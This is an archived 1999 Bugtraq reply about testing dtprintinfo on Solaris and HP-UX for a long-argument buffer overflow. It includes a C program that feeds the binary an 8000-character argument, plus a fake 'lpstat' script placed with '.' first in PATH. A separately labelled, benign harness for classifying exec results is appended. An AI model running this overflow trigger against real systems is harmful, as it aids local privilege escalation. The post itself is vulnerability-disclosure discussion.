[10554] in bugtraq
Re: [Solaris2.6,2.7 dtprintinfo exploits]
daemon@ATHENA.MIT.EDU (Thiago MM Zaninotti)
Fri May 14 13:59:29 1999
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Message-Id: <ISSMTP.98_21_.19990514121347.161I@unilever.com>
Date: Fri, 14 May 1999 12:13:47 -0300
Reply-To: Thiago MM Zaninotti <Thiago.M.M.Zaninotti@UNILEVER.COM>
From: Thiago MM Zaninotti <Thiago.M.M.Zaninotti@UNILEVER.COM>
X-To: Paul Hart <hart@iserver.com>
To: BUGTRAQ@NETSPACE.ORG

Hi Paul,

I'm sorry for the wrong output I've provided and you are correct: csh will
complain about long strings. I've already checked it in another shell and it
didn't appear to be vulnerable to the problem.

Thiago Zaninotti
IMC LABG

-----Original Message-----
From: Paul Hart [SMTP:hart@iserver.com]
Sent: Thursday, May 13, 1999 8:15 PM
To: Thiago MM Zaninotti
Subject: Re: [Solaris2.6,2.7 dtprintinfo exploits]
On Wed, 12 May 1999, Thiago MM Zaninotti wrote:
> dtprintinfo in HPUX does not seem to be vulnerable to the overflow problem:
>
> % /usr/dt/bin/dtprintinfo -p `perl -e "print 'A' x 8000"`
> Pathname too long.
> %
That's a message from your shell, not the dtprintinfo program; the
dtprintinfo program is never being run. Your shell thinks that 8000
characters in an argument is too long. You'll need to use a different
shell that can handle long arguments (I use tcsh) or make a small C
program that execs dtprintinfo with the long command argument. This
should work:
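
    #include <unistd.h>
    #include <string.h>
    #include <stdio.h>

    #define LENGTH 8000

    int main(void)
    {
        char buffer[LENGTH];

        /* Build a NUL-terminated argument of LENGTH - 1 'A' characters. */
        memset(buffer, 'A', LENGTH);
        buffer[LENGTH - 1] = '\0';

        /* exec directly so no shell limits the argument length. */
        execl("/usr/dt/bin/dtprintinfo", "dtprintinfo", "-p", buffer, (char *)NULL);

        /* Reached only if the exec itself failed. */
        perror("exec failed");
        return 1;
    }
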
Also make sure (at least on Solaris) that you have a script in your
current directory named "lpstat" and that "." is the first element of your
PATH environment variable. Here's what I have for my lpstat script:

    #!/bin/sh
    echo "system for lpprn: localhost"
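
The mix-up in this thread came from reading a shell error as the target program's own output. As an added example (not code from either poster), the harness below reports separately whether the exec itself failed, the program exited, or it died on a signal, so a negative test result can be trusted; `run_and_classify` and `struct outcome` are names made up for this illustration.

```c
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <sys/wait.h>
#include <unistd.h>

enum result { HARNESS_ERROR, EXEC_FAILED, EXITED, SIGNALED };
struct outcome { enum result kind; int detail; /* errno, exit status or signal */ };

/* Hypothetical helper: run path with argv and say whether it really started. */
struct outcome run_and_classify(const char *path, char *const argv[])
{
    struct outcome out = { HARNESS_ERROR, 0 };
    int fds[2], child_errno = 0, status = 0;
    ssize_t n;
    pid_t pid, w;
    if (pipe(fds) < 0) { out.detail = errno; return out; }
    /* Close-on-exec: a successful exec closes the write end, so we read EOF. */
    fcntl(fds[1], F_SETFD, FD_CLOEXEC);
    if ((pid = fork()) < 0) { out.detail = errno; close(fds[0]); close(fds[1]); return out; }
    if (pid == 0) {
        close(fds[0]);
        execv(path, argv);
        child_errno = errno;                 /* reached only if exec failed */
        if (write(fds[1], &child_errno, sizeof child_errno) < 0) _exit(126);
        _exit(127);
    }
    close(fds[1]);
    n = read(fds[0], &child_errno, sizeof child_errno);
    close(fds[0]);
    while ((w = waitpid(pid, &status, 0)) < 0 && errno == EINTR) {}
    if (n == (ssize_t)sizeof child_errno) {  /* target never ran, e.g. E2BIG */
        out.kind = EXEC_FAILED; out.detail = child_errno;
    } else if (w == pid && WIFSIGNALED(status)) {
        out.kind = SIGNALED; out.detail = WTERMSIG(status);
    } else if (w == pid && WIFEXITED(status)) {
        out.kind = EXITED; out.detail = WEXITSTATUS(status);
    }
    return out;
}

int main(int argc, char **argv)
{
    static const char *names[] = { "harness error", "exec failed", "exited", "signaled" };
    if (argc < 2) { fprintf(stderr, "usage: %s program [args...]\n", argv[0]); return 2; }
    struct outcome o = run_and_classify(argv[1], argv + 1);
    printf("%s (%d)\n", names[o.kind], o.detail);
    return 0;
}
```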